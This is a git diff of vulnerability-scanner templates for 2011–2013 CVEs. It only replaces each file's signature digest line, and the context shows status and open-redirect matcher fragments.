+48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ba506809b9ad5aab64016ffb9e331ef401083b09c3d3c9519f7e84d44413a6ef02210086a8844b3cbf42d134258706821a568927e093ad19a1c03fc0c27166b1509468:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a938dad2ca0752f37ede3203b9ab71d5d482c189e4fc44050aa003a698092a602202e585cabd7179acf08e47e17b7772a63a41cf24e386844b23849a2000d0187d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index f8ef973e5e..4207c3f053 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a004830460221008422f3fc7d6aacfd8515a15ffef9144684a05df3de2d614412f0b4fc30e99d3c022100c0d5eccddc0e5a69cbb4ae993e1400aa262559e3dcf2d5c085df453d9880ca0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f99080cb1f6a14c1c7507492bb1ce40cb83ed575df1382bdb95a816bc816bcf022100a76f2c3d5ebd1bb6e28911eb79be2955052034f399f7f77bf703ef6325eccd17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 9f41c568bd..29b60717f7 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206313bad87098f5965683f63da99d47a842af82dd612850eadc3943e6f1c4cd81022100ee53974c59c4a9d29ac7a810149c5e7ce9535b5bb808170cce6b91bc8150eb81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b6466b908f05ca97321722feec3fac0c52402e70afe8b7a004a5854ac086a868022100f56491bd0ce3832930d64a1e3f6115adaafe543a574e7aa1aa83548a2c5cf9a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index b47e07ed1d..878a613101 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022006282df56f2a901eecf94e9855d6db9df4946ed40b339abd3f6336b50969c41b02203b8999bd479093b096799e26a94f92a95d86ccd2f1eb2565bab5b8876cbe7e5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060742ba06252d62e0d60ea7142f78d9844ce69621800a5dec2eac67c0cef7c2d022100bf15f8ee83c8ae17ae2add607eb973716f239393463f59162a41a75039196a1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index b7365c9262..1349e135bf 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009683d0193918ff118b880d91083267c382f2691a3c9a956f08d27934ed4d25d5022025d99bbc4674f817bab05edcf843bc7763be217cb1c647100ee8207338e9055a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a45ea20da554fb16ffa28b503482fd27a71329139ee5eadef9b65bce2ee5e5002210096a3e6724f915ecaabf2aff9bbb8b48c1331998b16ac6c3dc9938c8a9238cd96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index decab44281..a1325ba47a 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202937c32be7ffb92c9a11e845916e4b40d7f62f0a6ebcef1fb4707157f2b6f3040221008c5d345fb60fb88321f3a4f22b952d0e6f3396362ed4e66a5feff7a9bf57dcb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f5523af855125e57f1abeeec99053ef016db1aaf7dc4353dfee50ff818483de9022100ba7d97fca57405488837c9296ab4710fbe1361845854d74828f6e9fc989a7526:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 67f2d379b1..bff4ba545b 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022058105695f45aca7080f4d99b0b495691bedb9798487eb893b5fa06a342008b53022100974de668cb5c4db918db8736a206169c76a05004a331d51435ebfd1bed2e3e89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022012e213172c9f620225fdfd9316468d781ba563e4f3787c775bc8f7e12bf9371c022100dd1382a3a68bef8dff24601e9666e8f8ba879a8ee944b5fe3ebac3b53b349480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index 1895fc14df..2ff8bec14f 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210091503c32f6e760d5c3d3aa871a287093fcf5f148c0541566fca436a744cb258f0221009e995a8a3d34953722e404cec14297887b6609f433012e27c2371ecbdf2cf5e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bde66e154af33ad3fcf5b34ddfead826e902daca07021c9e84b4c07176091bc30220409f3cf5b71da30028f5a06aceb989301563d5111c909c2747072bc41f11fe06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 356b8734b5..d03e66f2d4 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206af9d5437a082136493eb50bae5a2cca921987ff736bc0aa1511fae3d10b352b02205c58f3fb4179c7c0cde24051152d8f79edb60483338dead09ad495395d428d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b6f8347cf11dacb9953a8a3590f2c86f45374725699be2165a28d5b3187b4ae7022100b7c4ef412aa6e68ecc3933fb30ec048f92564ebfc4d42364214bdb818c5efa06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 551e24ed5c..c7b43ab262 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022031d3f94d24b3d0f70fdbac9bb5aa6ce3d64935726c0b22eb244045ee63bcd7ab022100a675ebeee4e80933737faac919151326ffe3bc30491219101218ee770e14ccaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022078c470467fa45b2ec299725e85c4cb0e41d83caec615211f0c7aa132662869ba02201727bcd77974bdd08f5ed52850243b95e892472aa7abb7fc1ae2f9b759356958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index ad5c3dd33f..3744cfa580 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d903161db4a66f050d495aa8c3e984263f7ff37e884924f6bb8d94a3060748bd02206cfb74efe3b2162cf198831ba090fa1c4cdacec5beb5689f8166486e88c25c83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f46eceef544f4dc44431a8958a6ec7e0631dd289addd2672a4f286e99009d089022100be551c45c6f45653354e2adc5e60b12a3207c0196e6eeaeff8a90ce9df699a2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index f4ca522e24..ec4f6690a9 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fa871bad697cfafab48725ec3acf1f122ff655983323458968c2fa6f74207a07022100dcd66b02aefd91501668a7752f8a4c4a77d32a10bbfe55efe4994d8d7fdc6088:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fd1ef5cb690f86a1f760e3b9260ee0d404eb638cd7fdc6d658fa3b9d6e47a71b022100ccad809d8c7393f1a2853b92c9640b6ac779007abaf95fd8a042ba5e514c71b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 29ad6c4175..ab90289d8b 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a60088dcada482af5029530d3b3d0e51b9af45aa4c0c305a241c89948cd3cc97022100f9cf4f0ca410a0b4479522c797020de7682ea6e26acbf65f9bdae70361ce1f4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022006162228d182a0d6beefb0beb208b533b7133d665f51b3a082b493f90a0c150402202ae82ffa66ff262a7ac623d41e139f5da1afb7b91d2ad5bb8705b8ade3958a36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 0af000a34d..c3d14e5190 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a451cb95840a08bc92aa3efac38d881cee6f1a25ce47babc654cd59cf8f2a338022100a60670a33e8bd6a0f7155deb1dfd658da441f4dc06d86f733814fa246002afca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f48779f01cf167c572ec183ea512c369c79c28a364598550de2287025df174cf022100e5e0b6eddea0cd55196c830ae05256681cda9b63f438d66ba5cf73201399143b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 916277fc5e..a3e9b56f3e 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -64,4 +64,4 @@ http: name: linux_working_path regex: - "/.*/showenv" -# digest: 4a0a0047304502206b20c1c55c81fef4dbaafa5d763e6e0080cf0589adcb5fd8ac1bb0d510083d8f022100a140c60aaa3a69d82b3f11e6534dfd0000323e2250e822e9bbe7080ce6e3836e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af0f80cacdfa44e0c487acf3cbeef137c7983a1d86104fce5b9fe2ae279e415202205e6bbfd32859844611a7345f82faa1dd714bf126320a64cc6f9ae4ed2cd261b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index 857a5d3d03..4256aedb23 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -47,4 +47,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 490a0046304402207602543f3bacfca903cf1afb4e30bb166b97caff3605c1cba10cfb3666d79e58022003987bc8f66668eed9e95e4de6bbc0e4ff9b51bb7e87d79d4c124dff966d1d93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e7ca6cb973edf490ea968d50af6a51998b01c3a244f17b81ae6dbd10b46618c002206210013739c1d4e4930b2dbd9b337f19cfd1e3baac403d362fd198d5737aaede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index ea9f184e77..39e8de4496 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d7aa854fa8a07369a25a7f77bdcda2a48c326d87c20b7de041758b4b78e8223d022071ce9f6abcf3c42eebfa1ebc2b4f4ab8d1a07c58afcbead343d3ead480a788f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c835962ff3b09116619a5603ae23d73a3c00cf560d66476916fa17da5c962278022056f2fd76326ac62b0b9e9ce9e6a5faafe684e48079694778dc2e3a2325de048c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 341183836e..6f8edd922e 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100af14a5dea698b34ecef70e5a08fb8d0ae4606149ac6ef546f9d4048d328607c1022042569e46d6fc5bc6349128f8650d8422bb936d441378285d4421181a63911748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220694fb811327105351a3727192b795d10a5c7cc7b7409e779684b6d726aae30d102204061ec85aceb963b1e07e1f653174736e146d4e18857c0b16a2a3faed2c85a55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index e7ce96be3c..548c782281 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201f895979c53a8a44c41029e255e3e6cca5f42d448ffc075e1ba0c63c0e029a53022016f1b9899f89a74da727b77ab77517a86e107c48714b6eb5b5c531f8fa6d938c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203528171e36863dbd99d4f2862f4cbd6e91a555b53b9522816e67589894856150022100fb954680c7918862199e1c99d538b0fbb04562265f9d703275043cba2eba44bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 4cff8baf35..a97ab749bd 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202a0794bed7e96c74b5c23e1a33771b5515251a4a11a3bdbf1bbef57faa66dc66022039605f685e93431029581e46a0793016be45d5f85c4c2d2e3a8df4ff8c2d1e4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220055fc60db15553f535cb2f6fcf67bd1cc520b02277765461c8ffd51762f11f5902210084e87a2ec22edaf75bdec61898915fab691023f085d93d1788e3a4168b576a5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 85e1596aac..9f5abd144f 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ebbe7f5db516dfb9e8d1f9cd08375491e27f7e7a86770cc1fe7315b25d62c95a022100901ba23913216d153ef95886eca13be0f5f29b5d414b8cc55cc303149d624e81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f44a6faed78c59b34c653ba2c94cb9c1f73a4a9c1e67e879e1cd5b5f9a792ec02203453c09f3cfaafe0014c8959b8d12c47dcb23885ae4fe13a1e8eec88309de277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index cd8e7b1007..c0d5a742b4 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce5195819e7865cf1103c9bc43bfb499880a1ddc9fac36f8df36fe36f8f0f96602204c4af856a0ec4128e55a6da648ca13aafb5d73e0771e886e5a811745dd4a129e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa29597df13f9be20853e7d53f74bfd4074efd553ca135d8cd09e252dda88cb102200d40eb505385c2f5947b72aed3a90466a6620bd6088253ae85b9943f8a87f85a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 04485c3dd9..52eeaf127a 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c6c35145fdfc7038b7cf7d21ab7bd2c23207b7b050865d00c256ebd58edf58fa022100a82057de268fce4de55702b67c8f3f09a548ebd9dd9fd06dba78cdecc367f033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009702b9da14f810d6eeaef6f02c62f884cfca24517e3947b4eb308770815e5d7b022100a5ce9a8170755f1c2a7ada77a63325c9d0572af46a756964929eda81b81ef4d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 1fd8d28971..c30e710069 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -42,4 +42,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022100bcb93a85e762a81c4ca7d98ce6b0fe3528962dce21efe81c1e1ee9ba9388b97302207f5783d3f27ff48af2191ffa4aa33643b3c3454f70003c551532af70f9344b2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200627f057adf460d4d29c7774795c6058e19d383dc7d3a21ef81e527c4cb010e4022074aa3a1cc95973fe97d96ea8f69eb8e9004f8f7acf45399349d887439d8f58ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 3d1b381dc9..b1e5f6933b 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a004730450221009b89a5eb4db723062b612d59daf2a4427a34860705309b3a8ccef0462629664102200aa9e5ac13539f5546a57a93e60a5bfbfb603ecdd27231e5ee4761989aeb6e5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fd1dbc8803c43b9fa3d0e32828c15e994a16437a5d08376f1da2e13f152411a6022100f0b8443694f31234144b52b46c8ef50c84da5ecb159d24b2ba4b88e2d808e34b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 2f1c77d5cb..5f147d04bf 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a004730450220474532ff614e3a938698419dd51826c9c2d641e33b47fe7f5d14ba903b3ad2bd022100d8e84f66303b745268bb2bbb7a786f1dd37d0c5c8d44583efee33c3b777046a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b18801cfcaeffb6b8223cd45e32fb0cc8dd6dd392675e35fae753de9c8ecc33022100865ea410aab5850c0c97e68c3b2a590774fbd834dafd19fcf63f1ad5e601f366:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index f7ec0e6f5b..17f464a5af 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206d1ea36955018c9a5addf005b4ca00aa6fe284b5943dda5d903b7ab128656ded02205f865a67e35c405383882c9ed298b28f63c6252c4a9535e191dddd67a845d74e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c6857c7ab58acd350ccee5399c3e22e20e3d784bbca09bacd2da2313f45f9e202204b166d284eeabeba016954d0de937546ce331aac085fc2295c5f27b0ea2bdeba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 01f72a6e3f..bb3044dda0 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100bd8af2517a97063f8f0ad4e7d78cd103cd7d8b32c38589a55980d7328bff66bb0221008316cb7f49de8d01ec1a35a1fd0f9614debd8d666390d579c45273af7cd348fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e440eb071bf52d801dfd47af1959cb176495ad1c2f67276d4f67708ce9b7b2dc02207051578a47da12fe390ee4102b51db72a92eb8b2c5ad9f7243b62eb3385c3d91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 6aea14788e..2f32f76080 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009903a3e1aa1de4796437c5ec22c7e9fe8f66b6933044675432f04de35069c0c80221009972ae5a17ade6f270b3a89a00754b6b4140d1a8680026e7214026f60f32a517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dccbe235c31b531fde7289dd5357abeb9c5c6ae1de04e92e80649553eeb5fc71022063262b19f8f9ad8095a183a4e52f2f40590f40927f397525a0b4654affbc1e23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index d34e1e54bf..d48e5122a2 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502205f523eda587cec05282805970bcacd0b1d52ab21c3cd109fb57a9b1576a41139022100d62846038f26508c564256caecfc689384db9ca1b9a2c21706077dbed9480472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d19dc37c5fb0a18dfd3b66635ee40673331dcb7d11e797e9ecb57a4ae831c5100220470c5d2a1b90cc5ea384bd801d5aef3f84ddb943959468b3a440dbd53e1af250:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 4ed81e57c8..a034f6fe7f 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -61,4 +61,4 @@ http: - 200 - 400 condition: or -# digest: 4a0a0047304502205601fb089b44d0324d4e78d34a355a1a218e71359e2b5cccfec09dc0dac2a830022100b3ba8a79988f901347cb27d7c2fad60577fb0d5d51daa8e7900c2b108584ca81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f861de30b41926e68924273c70bfc175574f6bcff993f93157f7a6748423c18c022014620b31cf6b99c6e54c4c55bc452f92588e5be9c104b6007afe6f672266f089:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index b8fe9216bd..62a581c805 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100df23b384d625e0c6b32964a3d6e3dd96f8a526e7423cfabb76e505554d75e8570221008663e84f3f5b73473b8bd3ec89c06b3b405ddeb7de0acc8e93238ccc461d9203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea92d4f2aeab4e789c6bfa4a4c04bb228683d53a8b96eb2e3e04cee1ad1e67370220791c3686925739a25ca487b1b792e41037ae378bc4909db98a63f1e284638e18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index 7df74bca69..16a3f82e9a 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a0046304402203356ff6dea12e2b33f72c0ce48ee00c534cd6e83cbe63d8174f9a71aec181166022007bf562e5422db455f87eeedfafd70e8516728a53184efff1ce66c5c8da0abab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040c532a5d2742341943945240d2abcb8d06c0d2ad43208529e1539d01036b6ad02210096698522cddd13934bef617580edc2966ca8cd57be2e1b5684ffefbfd2f49e7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 13b8d09fe4..48a013be95 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206a15e3183061f1b6d48531d10690ab71d1bee82e4634f305ef652f7c1519e9bd022100d0a37a0600fffa5c115e587879a2add388e0aea59727297f4b8f2c8e6e0f48cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100864898fb138302e7a63e7f449bdfc26f978992c2cd4d4b2fbf685a6f468f80c4022100ffabe3026c0b4034bd65cf7bb92ec9064b87c5a1ed8a4487ec3d047153139426:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index fdeb7e2915..4c75c5d9b9 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204d2823f93a1aae6f05e0644cc65bdc7bdf36bdd3d500a56c2725be8d3d395521022100864efdb6d1453afaf3ec7643f1d6911df4785f66d9981137b88a1a074a5debdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022043c9b1c5697a4e646e7e9949330a5cdc801eb74445aa99aae219a91587126f94022100b85681cb05b130b8f80bc0d356401911a253b38abb177aa49b00e79680d54732:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 0c302433b3..51e6525106 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d4b3fcbb4906b19001cf72d4aad9add7b544041dd97c0ccf35838cff913a8a6e022100e24d898f72a403c58117f0da9ad80377007fd8687238e628cc2cd9cd792380e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7b5818d682f6781dcdfe2cd4c843fae4f487d745432bcf67e64f8f51ab6f3aa022100ecd696f1c0f42240c868d9f7cf0cab71713c9db64143a3b9f3f6682ab66c7a09:922c64590222798bb761d5b6d8e72950 \ No newline at 